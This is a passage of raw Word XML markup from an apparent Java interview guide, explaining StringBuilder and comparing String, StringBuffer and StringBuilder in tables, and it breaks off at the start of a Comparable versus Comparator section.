          <v:rect id="_x0000_i1100" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB6FD4B" w14:textId="3E572E4D" w:rsidR="00DB1645" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB1645">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc197867234"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is StringBuilder?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="668A6563" w14:textId="34C3D90E" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="005E48C2">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in Java?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66606200"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sequence of characters, like StringBuffer, but it is </w:t>
      </w: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xml:space="preserve">, meaning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1A9C8E71"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designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single-threaded applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where performance is important and you need to frequently modify strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031142DF"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ecause it doesn't incur the overhead of synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483F12DE"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C3AEC9"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3505D4"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C2D5303"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495CEEB" w14:textId="1463D340"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583655B4" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>append() modifies the content of the original object, and no new object is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3782BF9F"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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFDF973"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CE4B95" w14:paraId="24ED0FF5" w14:textId="77777777" w:rsidTr="004B0688">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03577D95"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E797793"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4B0688" w:rsidRPr="00CE4B95" w14:paraId="5F15D78E" w14:textId="77777777" w:rsidTr="004B0688">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3589DD68"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04FFA97D"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4B0688" w:rsidRPr="00CE4B95" w14:paraId="28D810F9" w14:textId="77777777" w:rsidTr="004B0688">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63FB56CC"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C3DC5BF"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no synchronization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B0688" w:rsidRPr="00CE4B95" w14:paraId="3904F0FC" w14:textId="77777777" w:rsidTr="004B0688">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="040FD91B"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ty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F08A092"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hence not thread-safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B0688" w:rsidRPr="00CE4B95" w14:paraId="5B358997" w14:textId="77777777" w:rsidTr="004B0688">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D9DB56A"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Resizable — automatically grows as needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69348197" w14:textId="062EF4B9"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ethods in StringBuilder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DBF7A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BB769B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5FCBAD"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Append new text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5415943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p>
    <w:p w14:paraId="5AE4299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C92B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Insert text at a specified index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29358944"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p>
    <w:p w14:paraId="05DFC941"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386407"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place text in the specified range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F62613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p>
    <w:p w14:paraId="4C37905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A9E10F"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Delete text from a specified range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322BA27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4F03800C"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545432A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verse the string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D276EB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2CCFDBC5"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91AA96" w14:textId="20F23605"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Python Rocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7149634D" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>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ideal for frequent modifications, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concaten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nser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eversals</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1488B499" w14:textId="070F12B8"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ilder?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B85146B"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hen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6D279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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4595643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performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of string operations is a concern (since StringBuilder is faster).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F334677"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in a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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D22EF97"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Avoid StringBuilder in multi-threaded contexts where multiple threads may need to access the same object, as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004E3BB7"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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54559660"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erformance Comparison: String, StringBuffer, and StringBuilder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7276B1DF"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Immutable, creates a new object on every change — good for constant data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E92ADCC"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ffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Thread-safe but </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slower</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2259A0"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ut not thread-safe — ideal for single-threaded use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD54C40"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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDB40A4"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F4BA41F"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutable + thread-unsafe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> string manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E44395"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Best choice for performance</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s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37016A98"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Choose StringBuilder when you need to frequently </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modify strings</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and do not need thread safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DC0BF7" w14:textId="23431C19" w:rsidR="00B7737D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B7737D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="050B72E3">
          <v:rect id="_x0000_i1105" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31981218" w14:textId="15664CA6" w:rsidR="00DB1645" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB1645">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc197867235"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between String, StringBuffer and StringBuilder?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="31FAFF8E" w14:textId="7A8E7412" w:rsidR="00DB1645" w:rsidRPr="00CE4B9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CE4B95" w14:paraId="326CB527" w14:textId="77777777" w:rsidTr="008D5751">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="563ECAA5"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1F1121B"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58505A71"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ffer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DAA8994"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ilder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D5751" w:rsidRPr="00CE4B95" w14:paraId="59A966C9" w14:textId="77777777" w:rsidTr="008D5751">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F6E707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utable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ADD29CC"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199432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FB263B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r>
      <w:tr w:rsidR="008D5751" w:rsidRPr="00CE4B95" w14:paraId="2CBA847D" w14:textId="77777777" w:rsidTr="008D5751">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52D90309"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Thread Safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A565E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0E6843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0E6438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45D671B9" w14:textId="77777777" w:rsidTr="008D5751">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A798A74"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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73C12BD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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54BC2E6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derate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="524BED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Fastest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D5751" w:rsidRPr="00CE4B95" w14:paraId="4388C08F" w14:textId="77777777" w:rsidTr="008D5751">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ED59DA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Synchronized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="740DC2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4EDED5C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5BCB56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75209F41" w14:textId="77777777" w:rsidTr="008D5751">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="704FFCFF"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47A9B4AD"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Constant Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54853C5E"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Multi-threaded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1669D517"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Single-threaded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D5751" w:rsidRPr="00CE4B95" w14:paraId="09C5B176" w14:textId="77777777" w:rsidTr="008D5751">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F8A80E3"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emory Efficient?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F7F8377"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f constant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59E367F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efficient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70682F8F" w14:textId="49A0908B" w:rsidR="0090069D" w:rsidRPr="00CE4B95" w:rsidRDefault="0090069D" w:rsidP="0090069D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example Comparison</w:t>
      </w:r>
      <w:r w:rsidR="004B5978" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3D684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 (Immutable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D63FCA"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159F39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2E38F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7F08B7F2"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color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C0C5AA" w14:textId="77777777" w:rsidR="00925120" w:rsidRPr="00CE4B95"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p>
    <w:p w14:paraId="0C85B72D"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ffer (Mutable + Thread-safe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D1015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D2DC8E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10809B9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0DD96E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F29B0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ilder (Mutable + Not thread-safe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5931E1C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9AED2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04F5343B" w14:textId="48D37C33"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6B09A6C" w14:textId="6B20AA69" w:rsidR="00B7737D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B7737D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="6F5D58B2">
          <v:rect id="_x0000_i1106" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="442D23D0" w14:textId="77777777" w:rsidR="000C2FD8" w:rsidRPr="00CE4B95" w:rsidRDefault="000C2FD8" w:rsidP="00B7737D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C729251" w14:textId="77777777" w:rsidR="000C2FD8" w:rsidRPr="00CE4B95" w:rsidRDefault="000C2FD8" w:rsidP="00B7737D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2082B7C8" w14:textId="74ECA0AF" w:rsidR="00A8268C" w:rsidRPr="00CE4B95" w:rsidRDefault="005F5AB9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc197867236"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00501DAE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between comparable and comparator</w:t>
      </w:r>
      <w:r w:rsidR="00A8268C" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="0CAB12D8" w14:textId="173F2851" w:rsidR="00062B56" w:rsidRPr="00CE4B95"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CE4B95" w14:paraId="37A6E106" w14:textId="77777777" w:rsidTr="00062B56">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19FE93B4"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567532D0"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ble</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="692B27E8"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tor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00062B56" w:rsidRPr="00CE4B95" w14:paraId="083658B8" w14:textId="77777777" w:rsidTr="00062B56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="181372A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util</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00062B56" w:rsidRPr="00CE4B95" w14:paraId="302AC26E" w14:textId="77777777" w:rsidTr="00062B56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27F649DC"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natural ordering</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
